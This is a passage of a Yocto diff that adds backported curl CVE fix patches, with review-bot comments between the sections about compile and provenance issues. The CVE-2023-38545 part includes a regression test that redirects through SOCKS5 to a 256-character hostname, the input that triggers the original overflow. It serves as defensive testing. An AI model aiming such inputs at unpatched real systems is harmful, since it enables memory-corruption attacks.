+-/* only these backends define the tested functions */
+-#if defined(USE_OPENSSL) || defined(USE_GSKIT)
++UNITTEST_START
++{
++ int i;
++ for(i = 0; tests[i].host; i++) {
++ if(tests[i].match != Curl_cert_hostcheck(tests[i].pattern,
++ tests[i].host)) {
++ fprintf(stderr,
++ "HOST: %s\n"
++ "PTRN: %s\n"
++ "did %sMATCH\n",
++ tests[i].host,
++ tests[i].pattern,
++ tests[i].match ? "NOT ": "");
++ unitfail++;
++ }
++ }
++}
+
+- /* here you start doing things and checking that the results are good */
++UNITTEST_STOP
++#else
+
+-fail_unless(Curl_cert_hostcheck("www.example.com", "www.example.com"),
+- "good 1");
+-fail_unless(Curl_cert_hostcheck("*.example.com", "www.example.com"),
+- "good 2");
+-fail_unless(Curl_cert_hostcheck("xxx*.example.com", "xxxwww.example.com"),
+- "good 3");
+-fail_unless(Curl_cert_hostcheck("f*.example.com", "foo.example.com"),
+- "good 4");
+-fail_unless(Curl_cert_hostcheck("192.168.0.0", "192.168.0.0"),
+- "good 5");
+-
+-fail_if(Curl_cert_hostcheck("xxx.example.com", "www.example.com"), "bad 1");
+-fail_if(Curl_cert_hostcheck("*", "www.example.com"), "bad 2");
+-fail_if(Curl_cert_hostcheck("*.*.com", "www.example.com"), "bad 3");
+-fail_if(Curl_cert_hostcheck("*.example.com", "baa.foo.example.com"), "bad 4");
+-fail_if(Curl_cert_hostcheck("f*.example.com", "baa.example.com"), "bad 5");
+-fail_if(Curl_cert_hostcheck("*.com", "example.com"), "bad 6");
+-fail_if(Curl_cert_hostcheck("*fail.com", "example.com"), "bad 7");
+-fail_if(Curl_cert_hostcheck("*.example.", "www.example."), "bad 8");
+-fail_if(Curl_cert_hostcheck("*.example.", "www.example"), "bad 9");
+-fail_if(Curl_cert_hostcheck("", "www"), "bad 10");
+-fail_if(Curl_cert_hostcheck("*", "www"), "bad 11");
+-fail_if(Curl_cert_hostcheck("*.168.0.0", "192.168.0.0"), "bad 12");
+-fail_if(Curl_cert_hostcheck("www.example.com", "192.168.0.0"), "bad 13");
+-
+-#ifdef ENABLE_IPV6
+-fail_if(Curl_cert_hostcheck("*::3285:a9ff:fe46:b619",
+- "fe80::3285:a9ff:fe46:b619"), "bad 14");
+-fail_unless(Curl_cert_hostcheck("fe80::3285:a9ff:fe46:b619",
+- "fe80::3285:a9ff:fe46:b619"), "good 6");
+-#endif
++UNITTEST_START
+
++UNITTEST_STOP
+ #endif
+
+- /* you end the test code like this: */
+-
+-UNITTEST_STOP
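Review bot: The added line `* only these backends define the tested functions */` in the tests/unit/unit1397.c part has lost the `/` that opens the comment, so the patched file would have a stray `*` at file scope and a `*/` with no opener; it should read `/* only these backends define the tested functions */`, as the removed line further down still does. Unit test 1397 is what pins the stricter rule in hostmatch() (only a leading `*.` may act as a wildcard), so a unit file that does not compile leaves the certificate-name fix unverified wherever the unit tests are built. The header also names both Ubuntu and SUSE as the origin, and the diffstat lists tests/unit/Makefile.am and tests/unit/Makefile.inc although the body has no sections for them. One provenance line and a diffstat that matches the body would make the backport easier to audit.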
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28322.patch b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
new file mode 100644
index 0000000000..9351a2c286
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
@@ -0,0 +1,380 @@
+CVE: CVE-2023-28322
+Upstream-Status: Backport [ import patch from ubuntu curl_7.68.0-1ubuntu2.20
+upstream https://github.com/curl/curl/commit/7815647d6582c0a4900be2e1de ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 7815647d6582c0a4900be2e1de6c5e61272c496b Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 25 Apr 2023 08:28:01 +0200
+Subject: [PATCH] lib: unify the upload/method handling
+
+By making sure we set state.upload based on the set.method value and not
+independently as set.upload, we reduce confusion and mixup risks, both
+internally and externally.
+
+Closes #11017
+---
+ lib/curl_rtmp.c | 4 ++--
+ lib/file.c | 4 ++--
+ lib/ftp.c | 8 ++++----
+ lib/http.c | 4 ++--
+ lib/imap.c | 6 +++---
+ lib/rtsp.c | 4 ++--
+ lib/setopt.c | 6 ++----
+ lib/smb.c | 6 +++---
+ lib/smtp.c | 4 ++--
+ lib/tftp.c | 8 ++++----
+ lib/transfer.c | 4 ++--
+ lib/urldata.h | 2 +-
+ lib/vssh/libssh.c | 6 +++---
+ lib/vssh/libssh2.c | 6 +++---
+ lib/vssh/wolfssh.c | 2 +-
+ 15 files changed, 36 insertions(+), 38 deletions(-)
+
+--- a/lib/curl_rtmp.c
++++ b/lib/curl_rtmp.c
+@@ -213,7 +213,7 @@ static CURLcode rtmp_connect(struct conn
+ /* We have to know if it's a write before we send the
+ * connect request packet
+ */
+- if(conn->data->set.upload)
++ if(conn->data->state.upload)
+ r->Link.protocol |= RTMP_FEATURE_WRITE;
+
+ /* For plain streams, use the buffer toggle trick to keep data flowing */
+@@ -245,7 +245,7 @@ static CURLcode rtmp_do(struct connectda
+ if(!RTMP_ConnectStream(r, 0))
+ return CURLE_FAILED_INIT;
+
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ Curl_pgrsSetUploadSize(data, data->state.infilesize);
+ Curl_setup_transfer(data, -1, -1, FALSE, FIRSTSOCKET);
+ }
+--- a/lib/file.c
++++ b/lib/file.c
+@@ -198,7 +198,7 @@ static CURLcode file_connect(struct conn
+ file->freepath = real_path; /* free this when done */
+
+ file->fd = fd;
+- if(!data->set.upload && (fd == -1)) {
++ if(!data->state.upload && (fd == -1)) {
+ failf(data, "Couldn't open file %s", data->state.up.path);
+ file_done(conn, CURLE_FILE_COULDNT_READ_FILE, FALSE);
+ return CURLE_FILE_COULDNT_READ_FILE;
+@@ -390,7 +390,7 @@ static CURLcode file_do(struct connectda
+
+ Curl_pgrsStartNow(data);
+
+- if(data->set.upload)
++ if(data->state.upload)
+ return file_upload(conn);
+
+ file = conn->data->req.protop;
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -1371,7 +1371,7 @@ static CURLcode ftp_state_prepare_transf
+ data->set.str[STRING_CUSTOMREQUEST]:
+ (data->set.ftp_list_only?"NLST":"LIST"));
+ }
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ PPSENDF(&conn->proto.ftpc.pp, "PRET STOR %s", conn->proto.ftpc.file);
+ }
+ else {
+@@ -3303,7 +3303,7 @@ static CURLcode ftp_done(struct connectd
+ /* the response code from the transfer showed an error already so no
+ use checking further */
+ ;
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ if((-1 != data->state.infilesize) &&
+ (data->state.infilesize != data->req.writebytecount) &&
+ !data->set.crlf &&
+@@ -3570,7 +3570,7 @@ static CURLcode ftp_do_more(struct conne
+ connected back to us */
+ }
+ }
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ result = ftp_nb_type(conn, data->set.prefer_ascii, FTP_STOR_TYPE);
+ if(result)
+ return result;
+@@ -4209,7 +4209,7 @@ CURLcode ftp_parse_url_path(struct conne
+ ftpc->file = NULL; /* instead of point to a zero byte,
+ we make it a NULL pointer */
+
+- if(data->set.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
++ if(data->state.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
+ /* We need a file name when uploading. Return error! */
+ failf(data, "Uploading to a URL without a file name!");
+ free(rawPath);
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -2080,7 +2080,7 @@ CURLcode Curl_http(struct connectdata *c
+ }
+
+ if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
+- data->set.upload) {
++ data->state.upload) {
+ httpreq = HTTPREQ_PUT;
+ }
+
+@@ -2261,7 +2261,7 @@ CURLcode Curl_http(struct connectdata *c
+ if((conn->handler->protocol & PROTO_FAMILY_HTTP) &&
+ (((httpreq == HTTPREQ_POST_MIME || httpreq == HTTPREQ_POST_FORM) &&
+ http->postsize < 0) ||
+- ((data->set.upload || httpreq == HTTPREQ_POST) &&
++ ((data->state.upload || httpreq == HTTPREQ_POST) &&
+ data->state.infilesize == -1))) {
+ if(conn->bits.authneg)
+ /* don't enable chunked during auth neg */
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -1469,11 +1469,11 @@ static CURLcode imap_done(struct connect
+ result = status; /* use the already set error code */
+ }
+ else if(!data->set.connect_only && !imap->custom &&
+- (imap->uid || imap->mindex || data->set.upload ||
++ (imap->uid || imap->mindex || data->state.upload ||
+ data->set.mimepost.kind != MIMEKIND_NONE)) {
+ /* Handle responses after FETCH or APPEND transfer has finished */
+
+- if(!data->set.upload && data->set.mimepost.kind == MIMEKIND_NONE)
++ if(!data->state.upload && data->set.mimepost.kind == MIMEKIND_NONE)
+ state(conn, IMAP_FETCH_FINAL);
+ else {
+ /* End the APPEND command first by sending an empty line */
+@@ -1539,7 +1539,7 @@ static CURLcode imap_perform(struct conn
+ selected = TRUE;
+
+ /* Start the first command in the DO phase */
+- if(conn->data->set.upload || data->set.mimepost.kind != MIMEKIND_NONE)
++ if(conn->data->state.upload || data->set.mimepost.kind != MIMEKIND_NONE)
+ /* APPEND can be executed directly */
+ result = imap_perform_append(conn);
+ else if(imap->custom && (selected || !imap->mailbox))
+--- a/lib/rtsp.c
++++ b/lib/rtsp.c
+@@ -499,7 +499,7 @@ static CURLcode rtsp_do(struct connectda
+ rtspreq == RTSPREQ_SET_PARAMETER ||
+ rtspreq == RTSPREQ_GET_PARAMETER) {
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ putsize = data->state.infilesize;
+ data->set.httpreq = HTTPREQ_PUT;
+
+@@ -518,7 +518,7 @@ static CURLcode rtsp_do(struct connectda
+ result =
+ Curl_add_bufferf(&req_buffer,
+ "Content-Length: %" CURL_FORMAT_CURL_OFF_T"\r\n",
+- (data->set.upload ? putsize : postsize));
++ (data->state.upload ? putsize : postsize));
+ if(result)
+ return result;
+ }
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -258,8 +258,8 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ * We want to sent data to the remote host. If this is HTTP, that equals
+ * using the PUT request.
+ */
+- data->set.upload = (0 != va_arg(param, long)) ? TRUE : FALSE;
+- if(data->set.upload) {
++ arg = va_arg(param, long);
++ if(arg) {
+ /* If this is HTTP, PUT is what's needed to "upload" */
+ data->set.httpreq = HTTPREQ_PUT;
+ data->set.opt_no_body = FALSE; /* this is implied */
+@@ -486,7 +486,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ }
+ else
+ data->set.httpreq = HTTPREQ_GET;
+- data->set.upload = FALSE;
+ break;
+
+ case CURLOPT_COPYPOSTFIELDS:
+@@ -797,7 +796,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ */
+ if(va_arg(param, long)) {
+ data->set.httpreq = HTTPREQ_GET;
+- data->set.upload = FALSE; /* switch off upload */
+ data->set.opt_no_body = FALSE; /* this is implied */
+ }
+ break;
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -516,7 +516,7 @@ static CURLcode smb_send_open(struct con
+ byte_count = strlen(req->path);
+ msg.name_length = smb_swap16((unsigned short)byte_count);
+ msg.share_access = smb_swap32(SMB_FILE_SHARE_ALL);
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ msg.access = smb_swap32(SMB_GENERIC_READ | SMB_GENERIC_WRITE);
+ msg.create_disposition = smb_swap32(SMB_FILE_OVERWRITE_IF);
+ }
+@@ -792,7 +792,7 @@ static CURLcode smb_request_state(struct
+ smb_m = (const struct smb_nt_create_response*) msg;
+ req->fid = smb_swap16(smb_m->fid);
+ conn->data->req.offset = 0;
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ conn->data->req.size = conn->data->state.infilesize;
+ Curl_pgrsSetUploadSize(conn->data, conn->data->req.size);
+ next_state = SMB_UPLOAD;
+--- a/lib/smtp.c
++++ b/lib/smtp.c
+@@ -1210,7 +1210,7 @@ static CURLcode smtp_done(struct connect
+ result = status; /* use the already set error code */
+ }
+ else if(!data->set.connect_only && data->set.mail_rcpt &&
+- (data->set.upload || data->set.mimepost.kind)) {
++ (data->state.upload || data->set.mimepost.kind)) {
+ /* Calculate the EOB taking into account any terminating CRLF from the
+ previous line of the email or the CRLF of the DATA command when there
+ is "no mail data". RFC-5321, sect. 4.1.1.4.
+@@ -1297,7 +1297,7 @@ static CURLcode smtp_perform(struct conn
+ smtp->eob = 2;
+
+ /* Start the first command in the DO phase */
+- if((data->set.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
++ if((data->state.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
+ /* MAIL transfer */
+ result = smtp_perform_mail(conn);
+ else
+--- a/lib/tftp.c
++++ b/lib/tftp.c
+@@ -390,7 +390,7 @@ static CURLcode tftp_parse_option_ack(tf
+
+ /* tsize should be ignored on upload: Who cares about the size of the
+ remote file? */
+- if(!data->set.upload) {
++ if(!data->state.upload) {
+ if(!tsize) {
+ failf(data, "invalid tsize -:%s:- value in OACK packet", value);
+ return CURLE_TFTP_ILLEGAL;
+@@ -470,7 +470,7 @@ static CURLcode tftp_send_first(tftp_sta
+ return result;
+ }
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ /* If we are uploading, send an WRQ */
+ setpacketevent(&state->spacket, TFTP_EVENT_WRQ);
+ state->conn->data->req.upload_fromhere =
+@@ -505,7 +505,7 @@ static CURLcode tftp_send_first(tftp_sta
+ if(!data->set.tftp_no_options) {
+ char buf[64];
+ /* add tsize option */
+- if(data->set.upload && (data->state.infilesize != -1))
++ if(data->state.upload && (data->state.infilesize != -1))
+ msnprintf(buf, sizeof(buf), "%" CURL_FORMAT_CURL_OFF_T,
+ data->state.infilesize);
+ else
+@@ -559,7 +559,7 @@ static CURLcode tftp_send_first(tftp_sta
+ break;
+
+ case TFTP_EVENT_OACK:
+- if(data->set.upload) {
++ if(data->state.upload) {
+ result = tftp_connect_for_tx(state, event);
+ }
+ else {
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1405,6 +1405,7 @@ void Curl_init_CONNECT(struct Curl_easy
+ {
+ data->state.fread_func = data->set.fread_func_set;
+ data->state.in = data->set.in_set;
++ data->state.upload = (data->set.httpreq == HTTPREQ_PUT);
+ }
+
+ /*
+@@ -1816,7 +1817,7 @@ CURLcode Curl_retry_request(struct conne
+
+ /* if we're talking upload, we can't do the checks below, unless the protocol
+ is HTTP as when uploading over HTTP we will still get a response */
+- if(data->set.upload &&
++ if(data->state.upload &&
+ !(conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_RTSP)))
+ return CURLE_OK;
+
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1427,6 +1427,7 @@ struct UrlState {
+ BIT(stream_depends_e); /* set or don't set the Exclusive bit */
+ BIT(previouslypending); /* this transfer WAS in the multi->pending queue */
+ BIT(cookie_engine);
++ BIT(upload); /* upload request */
+ };
+
+
+@@ -1762,7 +1763,6 @@ struct UserDefined {
+ BIT(http_auto_referer); /* set "correct" referer when following
+ location: */
+ BIT(opt_no_body); /* as set with CURLOPT_NOBODY */
+- BIT(upload); /* upload request */
+ BIT(verbose); /* output verbosity */
+ BIT(krb); /* Kerberos connection requested */
+ BIT(reuse_forbid); /* forbidden to be reused, close after use */
+--- a/lib/vssh/libssh.c
++++ b/lib/vssh/libssh.c
+@@ -1076,7 +1076,7 @@ static CURLcode myssh_statemach_act(stru
+ }
+
+ case SSH_SFTP_TRANS_INIT:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SFTP_UPLOAD_INIT);
+ else {
+ if(protop->path[strlen(protop->path)-1] == '/')
+@@ -1686,7 +1686,7 @@ static CURLcode myssh_statemach_act(stru
+ /* Functions from the SCP subsystem cannot handle/return SSH_AGAIN */
+ ssh_set_blocking(sshc->ssh_session, 1);
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ if(data->state.infilesize < 0) {
+ failf(data, "SCP requires a known file size for upload");
+ sshc->actualcode = CURLE_UPLOAD_FAILED;
+@@ -1787,7 +1787,7 @@ static CURLcode myssh_statemach_act(stru
+ break;
+ }
+ case SSH_SCP_DONE:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SCP_SEND_EOF);
+ else
+ state(conn, SSH_SCP_CHANNEL_FREE);
+--- a/lib/vssh/libssh2.c
++++ b/lib/vssh/libssh2.c
+@@ -1664,7 +1664,7 @@ static CURLcode ssh_statemach_act(struct
+ }
+
+ case SSH_SFTP_TRANS_INIT:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SFTP_UPLOAD_INIT);
+ else {
+ if(sftp_scp->path[strlen(sftp_scp->path)-1] == '/')
+@@ -2366,7 +2366,7 @@ static CURLcode ssh_statemach_act(struct
+ break;
+ }
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ if(data->state.infilesize < 0) {
+ failf(data, "SCP requires a known file size for upload");
+ sshc->actualcode = CURLE_UPLOAD_FAILED;
+@@ -2504,7 +2504,7 @@ static CURLcode ssh_statemach_act(struct
+ break;
+
+ case SSH_SCP_DONE:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SCP_SEND_EOF);
+ else
+ state(conn, SSH_SCP_CHANNEL_FREE);
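Review bot: The diffstat of this backport lists `lib/vssh/wolfssh.c | 2 +-`, but the patch body ends with the lib/vssh/libssh2.c section and contains no wolfssh.c change. Because the lib/urldata.h part removes `BIT(upload)` from struct UserDefined, any remaining reader of `data->set.upload` stops compiling. If the target tree ships lib/vssh/wolfssh.c (the header says the patch was imported from Ubuntu's 7.68.0 package, which may predate that file), it needs the same one-line change to `if(data->state.upload)`. Searching lib/ for `set.upload` after the patch is applied would confirm that no reader was missed.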
diff --git a/meta/recipes-support/curl/curl/CVE-2023-32001.patch b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
new file mode 100644
index 0000000000..f533992bcd
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
@@ -0,0 +1,38 @@
+From 0c667188e0c6cda615a036b8a2b4125f2c404dde Mon Sep 17 00:00:00 2001
+From: SaltyMilk <soufiane.elmelcaoui@gmail.com>
+Date: Mon, 10 Jul 2023 21:43:28 +0200
+Subject: [PATCH] fopen: optimize
+
+Closes #11419
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/0c667188e0c6cda615a036b8a2b4125f2c404dde]
+CVE: CVE-2023-32001
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ lib/fopen.c | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/lib/fopen.c b/lib/fopen.c
+index c9c9e3d6e73a2..b6e3cadddef65 100644
+--- a/lib/fopen.c
++++ b/lib/fopen.c
+@@ -56,13 +56,13 @@ CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
+ int fd = -1;
+ *tempname = NULL;
+
+- if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
+- /* a non-regular file, fallback to direct fopen() */
+- *fh = fopen(filename, FOPEN_WRITETEXT);
+- if(*fh)
+- return CURLE_OK;
++ *fh = fopen(filename, FOPEN_WRITETEXT);
++ if(!*fh)
+ goto fail;
+- }
++ if(fstat(fileno(*fh), &sb) == -1 || !S_ISREG(sb.st_mode))
++ return CURLE_OK;
++ fclose(*fh);
++ *fh = NULL;
+
+ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
+ if(result)
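Review bot: The new open-then-`fstat()` sequence in Curl_fopen has no comment, and the removed `/* a non-regular file, fallback to direct fopen() */` was the only explanation for the early `return CURLE_OK`. The file type is now checked on the handle that was opened rather than on the path, so the check and the open can no longer refer to different files; the subject line "fopen: optimize" does not convey that. I would add `/* check the type on the opened handle, not the path, so check and open refer to the same file */` above the `fstat()` line and `/* not a regular file: write to it directly */` on the early return. Curl_fopen continues outside the hunk. Another backport in this change describes the tree as 7.69.1, so it is worth confirming that lib/fopen.c exists in that version and that this patch actually applies.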
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38545.patch b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
new file mode 100644
index 0000000000..c6b6726886
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
@@ -0,0 +1,148 @@
+From 600a1caeb2312fdee5ef1caf7d613c12a8b2424a Mon Sep 17 00:00:00 2001
+From: Mike Crowe <mac@mcrowe.com>
+Date: Wed, 11 Oct 2023 20:50:28 +0100
+Subject: [PATCH] socks: return error if hostname too long for remote resolve
+To: libcurl development <curl-library@cool.haxx.se>
+
+Prior to this change the state machine attempted to change the remote
+resolve to a local resolve if the hostname was longer than 255
+characters. Unfortunately that did not work as intended and caused a
+security issue.
+
+Name resolvers cannot resolve hostnames longer than 255 characters.
+
+Bug: https://curl.se/docs/CVE-2023-38545.html
+
+Unfortunately CURLE_PROXY and CURLPX_LONG_HOSTNAME were introduced in
+7.73.0 so they can't be used in 7.69.1. Let's use
+CURLE_COULDNT_RESOLVE_HOST as the best available alternative and update
+the test appropriately.
+
+libcurl's test support has been improved considerably since 7.69.1 which
+means that the test must be modified to remove use of %VERSION and
+%TESTNUMBER and the stderr output can no longer be checked.
+
+CVE: CVE-2023-38545
+Upstream-Status: Backport [fb4415d8aee6c1045be932a34fe6107c2f5ed147]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/socks.c | 13 +++++----
+ tests/data/Makefile.inc | 2 +-
+ tests/data/test728 | 60 +++++++++++++++++++++++++++++++++++++++++
+ 3 files changed, 69 insertions(+), 6 deletions(-)
+ create mode 100644 tests/data/test728
+
+diff --git a/lib/socks.c b/lib/socks.c
+index 37099130e..f3bf40533 100644
+--- a/lib/socks.c
++++ b/lib/socks.c
+@@ -521,11 +521,14 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
+ infof(conn->data, "SOCKS5: connecting to HTTP proxy %s port %d\n",
+ hostname, remote_port);
+
+- /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
++ /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet. */
+ if(!socks5_resolve_local && hostname_len > 255) {
+- infof(conn->data, "SOCKS5: server resolving disabled for hostnames of "
+- "length > 255 [actual len=%zu]\n", hostname_len);
+- socks5_resolve_local = TRUE;
++ failf(data, "SOCKS5: the destination hostname is too long to be "
++ "resolved remotely by the proxy.");
++ /* This version of libcurl doesn't have CURLE_PROXY and
++ * therefore CURLPX_LONG_HOSTNAME, so let's report the best we
++ * can. */
++ return CURLE_COULDNT_RESOLVE_HOST;
+ }
+
+ if(auth & ~(CURLAUTH_BASIC | CURLAUTH_GSSAPI))
+@@ -837,7 +840,7 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
+
+ if(!socks5_resolve_local) {
+ socksreq[len++] = 3; /* ATYP: domain name = 3 */
+- socksreq[len++] = (char) hostname_len; /* one byte address length */
++ socksreq[len++] = (unsigned char) hostname_len; /* one byte length */
+ memcpy(&socksreq[len], hostname, hostname_len); /* address w/o NULL */
+ len += hostname_len;
+ infof(data, "SOCKS5 connect to %s:%d (remotely resolved)\n",
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 3d8565c36..5ee2284ff 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -89,7 +89,7 @@ test662 test663 test664 test665 test666 test667 test668 \
+ test670 test671 test672 test673 \
+ \
+ test700 test701 test702 test703 test704 test705 test706 test707 test708 \
+-test709 test710 test711 test712 test713 test714 test715 test716 test717 \
++test709 test710 test711 test712 test713 test714 test715 test716 test717 test728 \
+ \
+ test800 test801 test802 test803 test804 test805 test806 test807 test808 \
+ test809 test810 test811 test812 test813 test814 test815 test816 test817 \
+diff --git a/tests/data/test728 b/tests/data/test728
+new file mode 100644
+index 000000000..7b1d8b2f3
+--- /dev/null
++++ b/tests/data/test728
+@@ -0,0 +1,60 @@
++<testcase>
++<info>
++<keywords>
++HTTP
++HTTP GET
++SOCKS5
++SOCKS5h
++followlocation
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++# The hostname in this redirect is 256 characters and too long (> 255) for
++# SOCKS5 remote resolve. curl must return error CURLE_PROXY in this case.
++<data>
++HTTP/1.1 301 Moved Permanently
++Location: http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
++Content-Length: 0
++Connection: close
++
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++proxy
++</features>
++<server>
++http
++socks5
++</server>
++ <name>
++SOCKS5h with HTTP redirect to hostname too long
++ </name>
++ <command>
++--no-progress-meter --location --proxy socks5h://%HOSTIP:%SOCKSPORT http://%HOSTIP:%HTTPPORT/728
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++<strip>
++^User-Agent:.*
++</strip>
++<protocol>
++GET /728 HTTP/1.1
++Host: %HOSTIP:%HTTPPORT
++Accept: */*
++
++</protocol>
++<errorcode>
++6
++</errorcode>
++</verify>
++</testcase>
+--
+2.39.2
+
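Review bot: The comment added in tests/data/test728 still says `curl must return error CURLE_PROXY in this case`, while this backport returns `CURLE_COULDNT_RESOLVE_HOST` from Curl_SOCKS5 and the test's `<errorcode>` expects 6. The comment should describe the adapted behaviour, for example `# SOCKS5 remote resolve. This backport returns CURLE_COULDNT_RESOLVE_HOST (6).`, so that nobody later "corrects" the expected code to match the text. As far as the two lib/socks.c hunks show, the early return is what keeps a length above 255 from reaching the one-byte length field, and the `(unsigned char)` cast is cosmetic after that. Curl_SOCKS5 starts and ends outside both hunks.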
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38546.patch b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
new file mode 100644
index 0000000000..30ef2fd038
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
@@ -0,0 +1,132 @@
+From 7b67721f12cbe6ed1a41e7332f3b5a7186a5e23f Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 14 Sep 2023 23:28:32 +0200
+Subject: [PATCH] cookie: remove unnecessary struct fields
+To: libcurl development <curl-library@cool.haxx.se>
+
+Plus: reduce the hash table size from 256 to 63. It seems unlikely to
+make much of a speed difference for most use cases but saves 1.5KB of
+data per instance.
+
+Closes #11862
+
+This patch taken from Debian's 7.64.0-4+deb10u7 package which applied with
+only a little fuzz.
+
+CVE: CVE-2023-38546
+Upstream-Status: Backport [61275672b46d9abb32857404]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/cookie.c | 13 +------------
+ lib/cookie.h | 7 ++-----
+ lib/easy.c | 4 +---
+ 3 files changed, 4 insertions(+), 20 deletions(-)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1c4..a378f28e1 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -114,7 +114,6 @@ static void freecookie(struct Cookie *co)
+ free(co->name);
+ free(co->value);
+ free(co->maxage);
+- free(co->version);
+ free(co);
+ }
+
+@@ -641,11 +640,7 @@ Curl_cookie_add(struct Curl_easy *data,
+ }
+ }
+ else if(strcasecompare("version", name)) {
+- strstore(&co->version, whatptr);
+- if(!co->version) {
+- badcookie = TRUE;
+- break;
+- }
++ /* just ignore */
+ }
+ else if(strcasecompare("max-age", name)) {
+ /* Defined in RFC2109:
+@@ -1042,7 +1037,6 @@ Curl_cookie_add(struct Curl_easy *data,
+ free(clist->path);
+ free(clist->spath);
+ free(clist->expirestr);
+- free(clist->version);
+ free(clist->maxage);
+
+ *clist = *co; /* then store all the new data */
+@@ -1111,9 +1105,6 @@ struct CookieInfo *Curl_cookie_init(struct Curl_easy *data,
+ c = calloc(1, sizeof(struct CookieInfo));
+ if(!c)
+ return NULL; /* failed to get memory */
+- c->filename = strdup(file?file:"none"); /* copy the name just in case */
+- if(!c->filename)
+- goto fail; /* failed to get memory */
+ }
+ else {
+ /* we got an already existing one, use that */
+@@ -1241,7 +1232,6 @@ static struct Cookie *dup_cookie(struct Cookie *src)
+ CLONE(name);
+ CLONE(value);
+ CLONE(maxage);
+- CLONE(version);
+ d->expires = src->expires;
+ d->tailmatch = src->tailmatch;
+ d->secure = src->secure;
+@@ -1457,7 +1447,6 @@ void Curl_cookie_cleanup(struct CookieInfo *c)
+ {
+ if(c) {
+ unsigned int i;
+- free(c->filename);
+ for(i = 0; i < COOKIE_HASH_SIZE; i++)
+ Curl_cookie_freelist(c->cookies[i]);
+ free(c); /* free the base struct as well */
+diff --git a/lib/cookie.h b/lib/cookie.h
+index b3865e601..2e667cda0 100644
+--- a/lib/cookie.h
++++ b/lib/cookie.h
+@@ -36,8 +36,6 @@ struct Cookie {
+ char *expirestr; /* the plain text version */
+ bool tailmatch; /* whether we do tail-matching of the domain name */
+
+- /* RFC 2109 keywords. Version=1 means 2109-compliant cookie sending */
+- char *version; /* Version = <value> */
+ char *maxage; /* Max-Age = <value> */
+
+ bool secure; /* whether the 'secure' keyword was used */
+@@ -54,15 +52,14 @@ struct Cookie {
+ #define COOKIE_PREFIX__SECURE (1<<0)
+ #define COOKIE_PREFIX__HOST (1<<1)
+
+-#define COOKIE_HASH_SIZE 256
